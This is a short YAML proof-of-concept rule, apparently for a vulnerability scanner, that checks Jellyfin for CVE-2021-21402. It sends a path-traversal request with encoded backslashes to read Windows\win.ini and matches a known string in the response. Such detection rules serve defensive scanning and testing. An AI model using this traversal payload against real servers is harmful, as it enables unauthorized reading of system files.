name: poc-yaml-jellyfin-file-read-cve-2021-21402
rules:
  - method: GET
    path: "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
    expression: |
      response.status == 200 && response.body.bcontains(b"for 16-bit app support")
detail:
  author: Print1n(https://github.com/Print1n)
  links:
    - https://blog.csdn.net/qq_41503511/article/details/116274406